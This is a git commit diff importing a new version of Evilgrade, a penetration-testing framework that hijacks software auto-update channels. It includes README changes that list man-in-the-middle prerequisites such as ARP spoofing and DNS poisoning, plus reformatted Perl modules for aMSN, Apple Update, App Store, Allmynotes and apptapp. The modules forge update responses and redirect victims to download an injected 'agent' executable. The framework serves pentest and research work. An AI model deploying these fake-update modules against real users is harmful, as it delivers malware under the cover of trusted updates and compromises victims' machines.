Commit 5d4be768 authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 2.0.7+git20160629

parent d3ed3654
......@@ -12,11 +12,11 @@ Evilgrade is a modular framework that allows the user to take advantage of poor
It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.
Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
* When should I use evilgrade?
##### * When should I use evilgrade?
This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:
Internal scenery:
##### Internal scenery:
- Internal DNS access
- ARP spoofing
- DNS Cache Poisoning
......@@ -24,19 +24,19 @@ Internal scenery:
- TCP hijacking
- Wi-Fi Access Point impersonation
External scenery:
##### External scenery:
- Internal DNS access
- DNS Cache Poisoning
* How does it work?
##### * How does it work?
Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.
* What OS are supported?
##### * What OS are supported?
ISR-Evilgrade is crossplatform, it only depends of having an appropriate payload for the right target platform to be exploited.
Implemented modules:
#### Implemented modules:
-------------------
- Freerip 3.30
- Jet photo 4.7.2
......@@ -422,7 +422,7 @@ help - prints this screen, or help on 'command'
```
.:: [ADVANCED] ::.
## .:: [ADVANCED] ::.
- Modules Options:
Each module has special options, but the "agent" field is always present.
......@@ -473,7 +473,7 @@ After our payload was generated, we leave a multi handler listening on the previ
[*] Starting the payload handler...
```
.:: [MODULE DEVELOPMENT] ::.
## .:: [MODULE DEVELOPMENT] ::.
Module development is very simple. Since evilgrade is based on modules, you just have to use a package .pm (perl module).
In this case we are going to describe the sunjava update module (comments with #):
......@@ -590,17 +590,42 @@ my $base=
};
```
.:: [TIPS] ::.
## .:: [TIPS] ::.
1) Don't forget to run evilgrade with an user that has privileges to create listening sockets,
otherwise you won't be able to use evilgrade's Services.
2) Everytime you modify a module with evilgrade running don't forget to 'reload' them.
3) Set the binary 'agents' before starting services because there are some fields that evilgrade
will fill out for you (agentmd5, agentsha256, and agentsize) that can't be done with them already running.
.:: [REQUIREMENTS] ::.
4) If you're using a dynamic response with variables such as: <%AGENTSIZE%>, <%AGENTMD5%>, <%URL\_FILE%>, <%URL\_FILE\_EXT%>, or custom ones defined at the options section, don't forget to set *parse* on 1.
5) Same goes for injecting an agent, you must enable de *bin* flag on 1.
6) If you want to make plaintext responses using HTTP use the *cheader* flag. Example below:
```
{ 'req' => '/sitepath/download/file.zip'
, #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
. "Location: http://sitedomain.com/<%URL_FILE%>.exe \r\n"
. "Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
7) To filter via User-Agent, use as an example the Sparkle2 module. In base add 'useragent' => 'true', and on a request use as you would use the 'req' field but for user agents in 'useragent'. Note that this field already stripped "User-Agent: ".
```
## .:: [REQUIREMENTS] ::.
# Perl Modules
### Perl Modules
```
Data::Dump
Digest::MD5
......@@ -608,7 +633,7 @@ will fill out for you (agentmd5, agentsha256, and agentsize) that can't be done
RPC::XML
```
.:: [MORE INFORMATION] ::.
## .:: [MORE INFORMATION] ::.
This framework was presented in the following security conferences:
......@@ -621,7 +646,7 @@ This framework was presented in the following security conferences:
```
.:: [AUTHOR] ::.
## .:: [AUTHOR] ::.
Francisco Amato
famato+at+infobytesec+dot+com
Version 2.0.8 - 08-06-2016
--------------------------
- ASUS OEM LiveUpdate module added
- Fixed ReadLine::Gnu bug
- Improved README.md
- Added a 2 new configuration variables <%URL_FILE%> and <%URL_FILE_EXT%>
- ACER Care Center Live Update module added
- OpenBazaar module added
- Sparkle module generic exploitation added
- Extended filtering of requests via useragent too.
Version 2.0.7 - 03-06-2016
--------------------------
- (Samsung SW Update Tool 2.2.5.16) samsung module added
......@@ -50,7 +61,7 @@ Last Versions:
- Jet photo 4.7.2
*- Teamviewer 5.1.9385
- ISOpen 4.5.0
- Istat
- Istat
- Gom 2.1.25.5015
- Atube catcher 1.0.300
- Vidbox 7.5
......@@ -86,7 +97,7 @@ Last Versions:
- Flashget
- Miranda
- Orbit
- Photoscape
- Photoscape
- Panda Antirootkit
- Skype
- Sunbelt
......@@ -102,7 +113,7 @@ Last Versions:
- Paint.Net 3.5.4
- wmedia version 9
- Cygwin 1.5.25-11
- DIVX Suite 6.2 ( Player, WebPlayer, Codec Converter, DrDivX )
- DIVX Suite 6.2 ( Player, WebPlayer, Codec Converter, DrDivX )
- Opera 9.51
......
This diff is collapsed.
This diff is collapsed.
This diff is collapsed.
......@@ -27,49 +27,52 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'Allmynotes',
my $base = {
'name' => 'Allmynotes',
'version' => '1.0',
'appver' => '< 1.26',
'author' => [ 'German Rodriguez < grodriguez +[AT]+ infobytesec.com >' ],
'description' => qq{},
'vh' => '(www.vladonai.com)',
'request' => [
{
'req' => '/online_update_checker.php', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '',
'parse' => 1,
'file' => './include/allmynotes/version',
},
{
'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
'author' => ['German Rodriguez < grodriguez +[AT]+ infobytesec.com >'],
'description' => qq{},
'vh' => '(www.vladonai.com)',
'request' => [
{ 'req' => '/online_update_checker.php', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '',
'parse' => 1,
'file' => './include/allmynotes/version',
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
'version' => { 'val' => '\'7.\'.isrcore::utils::RndNum(2)',
'hidden' => 1,
'dynamic' =>1,
},
'rnd1' => { 'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' =>1,
}
}
#Options
'options' => {
'agent' =>
{ 'val' => './agent/agent.exe', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'version' => {
'val' => '\'7.\'.isrcore::utils::RndNum(2)',
'hidden' => 1,
'dynamic' => 1,
},
'rnd1' => {
'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' => 1,
}
}
};
##########################################################################
......@@ -82,5 +85,5 @@ sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
}
1;
......@@ -27,71 +27,73 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'aMSN',
'appver' => '<= 0.98.3',
'version' => '1.0',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
'description' => qq{},
'vh' => 'www.amsn-project.net',
'request' => [
{
'req' => '/amsn_latest', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "<%VERSION%>",
'parse' => '1',
'file' => ''
},
{
'req' => '.xml', #autoupdate plugins features no implemented
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "",
'parse' => '0',
'file' => ''
},
my $base = {
'name' => 'aMSN',
'appver' => '<= 0.98.3',
'version' => '1.0',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com>'],
'description' => qq{},
'vh' => 'www.amsn-project.net',
'request' => [
{ 'req' => '/amsn_latest', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "<%VERSION%>",
'parse' => '1',
'file' => ''
},
{ 'req' => '.xml', #autoupdate plugins features no implemented
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "",
'parse' => '0',
'file' => ''
},
{ 'req' => '/$', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' =>
'<html><script>window.location="http://www.amsn-project.net/amsn<%RND1%>.exe"</script></html>',
'parse' => 1,
'file' => '',
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
{
'req' => '/$', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '<html><script>window.location="http://www.amsn-project.net/amsn<%RND1%>.exe"</script></html>',
'parse' => 1,
'file' => '',
},
{
'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
'version' => { 'val' => "'2.'.isrcore::utils::RndNum(3).'.'.isrcore::utils::RndNum(1)",
'hidden' => 1,
'dynamic' =>1,
},
'rnd1' => { 'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' =>1,
},
}
};
#Options
'options' => {
'agent' =>
{ 'val' => './agent/agent.exe', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'version' => {
'val' =>
"'2.'.isrcore::utils::RndNum(3).'.'.isrcore::utils::RndNum(1)",
'hidden' => 1,
'dynamic' => 1,
},
'rnd1' => {
'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' => 1,
},
}
};
##########################################################################
# FUNCTION new
......
......@@ -25,98 +25,100 @@ package modules::appleupdate;
use strict;
use Data::Dump qw(dump);
my $base=
{
'name' => 'Apple Windows Update Software',
my $base = {
'name' => 'Apple Windows Update Software',
'version' => '1.0',
'appver' => ' < 2.1.2 (<= Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
'description' => qq{},
'vh' => '(swcatalog.apple.com|swcdn.apple.com|itunes.com|swscan.apple.com)',
'appver' =>
' < 2.1.2 (<= Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com>'],
'description' => qq{},
'vh' =>
'(swcatalog.apple.com|swcdn.apple.com|itunes.com|swscan.apple.com)',
'request' => [
{
'req' => '\.sucatalog$', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/appleupdate_catalog.xml'
},
{ 'req' => '\.sucatalog$', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/appleupdate_catalog.xml'
},
{
'req' => '061-4339.Spanish.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
{ 'req' => '061-4339.Spanish.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
# {
# 'req' => 'AppleSoftwareUpdate.exe', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './include/appleupdate/SoftwareUpdate.exe'
# },
# {
# 'req' => 'AppleSoftwareUpdate.dmg', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './agent/osx/update.dmg'
# },
# {
# 'req' => 'AppleSoftwareUpdate.exe', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './include/appleupdate/SoftwareUpdate.exe'
# },
# {
# 'req' => 'AppleSoftwareUpdate.dmg', #regex friendly
# 'type' => 'file', #file|string|agent|install
# 'method' => '', #any
# 'bin' => '1',
# 'string' => '',
# 'parse' => '1',
# 'file' => './agent/osx/update.dmg'
# },
{
'req' => '.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
{ 'req' => '.dist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => './include/appleupdate/061-4339.Spanish.dist'
},
{
'req' => '/closed.html', #regex anything
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
."Location: http://swcatalog.apple.com/update<%RND%>.exe \r\n"
."Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
{
'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
{ 'req' => '/closed.html', #regex anything
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
. "Location: http://swcatalog.apple.com/update<%RND%>.exe \r\n"
. "Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
'rnd' => { 'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' =>1,},
}
};
#Options
'options' => {
'agent' =>
{ 'val' => './agent/agent.exe', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'rnd' => {
'val' => 'isrcore::utils::RndNum(5)',
'hidden' => 1,
'dynamic' => 1,
},
}
};
##########################################################################
# FUNCTION new
......
......@@ -27,46 +27,48 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'appstore',
my $base = {
'name' => 'appstore',
'version' => '1.0',
'appver' => '< Mac OS X v10.6.*',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com >' ],
'description' => qq{CVE: CVE-2011-3224 Found By: Aaron Sigel and Brian Mastenbrook
The agent have a modification in Resources/scripts/updatefrontend.py to open a Chess application
look for the comment evilgrade.
The code is execute the next time the user open the help book, more information:
http://vttynotes.blogspot.com/2011/10/cve-2011-3224-mitm-to-rce-with-mac-app.html},
'vh' => '(help.apple.com)',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com >'],
'description' =>
qq{CVE: CVE-2011-3224 Found By: Aaron Sigel and Brian Mastenbrook
The agent have a modification in Resources/scripts/updatefrontend.py to open a Chess application
look for the comment evilgrade.
The code is execute the next time the user open the help book, more information:
http://vttynotes.blogspot.com/2011/10/cve-2011-3224-mitm-to-rce-with-mac-app.html},
'vh' => '(help.apple.com)',
'request' => [
{
'req' => 'helpbook-version.txt', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '324071169.795686',
'parse' => 0,
'file' => '',
},
{ 'req' => 'helpbook-version.txt', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '324071169.795686',
'parse' => 0,
'file' => '',
},
{
'req' => '.zip', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' =>1,
'string' => '',
'parse' => 0,
'file' => ''
},
{ 'req' => '.zip', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/helpbook.zip', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
}
#Options
'options' => {
'agent' =>
{ 'val' => './agent/helpbook.zip', 'desc' => 'Agent to inject' },
'enable' => {
'val' => 1,
'desc' => 'Status'
},
}
};
##########################################################################
......@@ -79,5 +81,5 @@ sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
}
1;
......@@ -27,116 +27,128 @@ use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'apptapp',
'version' => '1.0',
'appver' => '< 3.11',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
my $base = {
'name' => 'apptapp',
'version' => '1.0',
'appver' => '< 3.11',
'author' => ['Francisco Amato < famato +[AT]+ infobytesec.com>'],
'description' => qq{},
'vh' => '(www.apptapp.com|repository.apptapp.com)',
'request' => [
{
'req' => '/trusted.plist', #regex friendly
'type' => 'file', #file|string|agent|install
'method' => '', #any
'bin' => '',
'string' => "",
'parse' => '1',
'file' => './include/apptapp/trusted.plist'
},
{
'req' => '/feature', #regex friendly
'type' => 'file', #file|string|agent|install